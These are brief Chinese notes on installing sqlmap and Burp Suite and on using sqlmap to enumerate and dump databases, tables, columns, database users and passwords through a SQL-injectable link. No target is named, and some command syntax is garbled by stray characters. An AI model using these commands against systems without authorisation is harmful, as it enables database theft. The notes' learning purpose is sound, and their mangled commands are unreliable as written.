官网下载python2.7
sqlmap最新版
设置环境变量,cmd运行sqlmap.py

当注入点后面的参数大于2时,加英文双引号
空格 —?batch,自动按照默认执行
burp抓包,判断文本中请求是否存在注入 ,sqlmap.py -r? 1.txt
查询当前用户下的所有数据库?sqlmap.py -u?链接 –dbs
获取数据库中的表名?sqlmap.py -u?links -D?数据库?–tables(不指定数据库,会列出所有数据库下的所有表)
获取表中的字段名(列名)sqlmap.py? -u? links? -D security? -T users(表名)? –columns
获取字段内容?sqlmap.py -u links -D security -T users -C id.password.username –dump
获取数据库中所有的用户(数据库的用户)?sqlmap.py -u?links –users
获取数据库用户的密码?sqlmap.py -u links –passwords
获取当前网站数据库的名称?sqlmap.py -u links –current-db
获取当前网站数据库的用户名称?sqlmap.py -u links –current-user
burp的安装
安装java jbk,设置环境变量
新建系统变量 JAVA_HOME? java/jdk
path java/jdk/bin
cmd输入javac,出现 “可能的选项” 这样的汉字提示,说明安装成功。
下载?Burp Suite Community